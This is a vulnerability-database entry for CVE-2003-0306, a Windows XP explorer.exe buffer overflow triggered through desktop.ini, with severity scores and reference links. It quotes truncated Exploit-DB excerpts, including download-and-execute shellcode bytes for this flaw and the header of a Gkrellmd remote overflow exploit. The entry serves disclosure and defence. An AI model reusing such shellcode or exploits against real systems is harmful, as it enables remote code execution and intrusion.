CVE-2003-0306
published 2003-06-09CVE-2003-0306: Buffer overflow in EXPLORER.EXE on Windows XP allows attackers to execute arbitrary code as the XP user via a desktop.ini file with a long .ShellClassInfo…
PriorityP424high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
4.04%
89.3th percentile
Buffer overflow in EXPLORER.EXE on Windows XP allows attackers to execute arbitrary code as the XP user via a desktop.ini file with a long .ShellClassInfo parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Gkrellmd 2.1 - Remote Buffer Overflow (2)
exploitdb·2003-06-24
CVE-2003-0723 Gkrellmd 2.1 - Remote Buffer Overflow (2)
Gkrellmd 2.1 - Remote Buffer Overflow (2)
---
source: https://www.securityfocus.com/bid/8022/info
GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible.
The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the maximum reserved memory buffer size is received arbitrary memory may be corrupted.
A remote attacker may ultimately exploit this issue remotely to seize control of the affected daemon and execute arbitrary code.
This vulnerability has been reported to affect Gkrellm 2.1.13.
#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code an
Exploit-DB
Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow
exploitdb·2003-05-21
CVE-2003-0306 Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow
Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow
---
#include
#include
#include
#include
#include
char shellcode[]=
//download url and exec shellcode
//doesn't have any hardcoded values
//except the base address of the program
//searches the import table for
//LoadLibraryA, GetProcAddress and ExitProcess.
//by .einstein., dH team.
"\x81\xec\x40\x1f\x00\x00\xe8\x00\x00\x00\x00\x5d\x83\xed\x0b\xbf\x61\x57"
"\x7a\x74\xe8\x8c\x00\x00\x00\x89\xbd\x17\x01\x00\x00\xbf\x65\x1d\x22\x74"
"\xe8\x7c\x00\x00\x00\x89\xbd\x1b\x01\x00\x00\xbf\x17\x75\x79\x70\xe8\x6c"
"\x00\x00\x00\x89\xbd\x1f\x01\x00\x00\x8d\x85\x2c\x01\x00\x00\x50\x2e\xff"
"\x95\x17\x01\x00\x00\x8d\x9d\x33\x01\x00\x00\x53\x50\x2e\xff\x95\x1b\x01"
"\x00\x00\x6a\x00\x6a\x00\x8d\x8d\x4e\x01\x00\x00\x51\x8d\x8d\x5c\x01\x00"
"\x
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=105284486526310&w=2http://marc.info/?l=bugtraq&m=105301349925036&w=2http://marc.info/?l=vuln-dev&m=105241032526289&w=2https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-027https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A3095http://marc.info/?l=bugtraq&m=105284486526310&w=2http://marc.info/?l=bugtraq&m=105301349925036&w=2http://marc.info/?l=vuln-dev&m=105241032526289&w=2https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-027https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A3095
2003-06-09
Published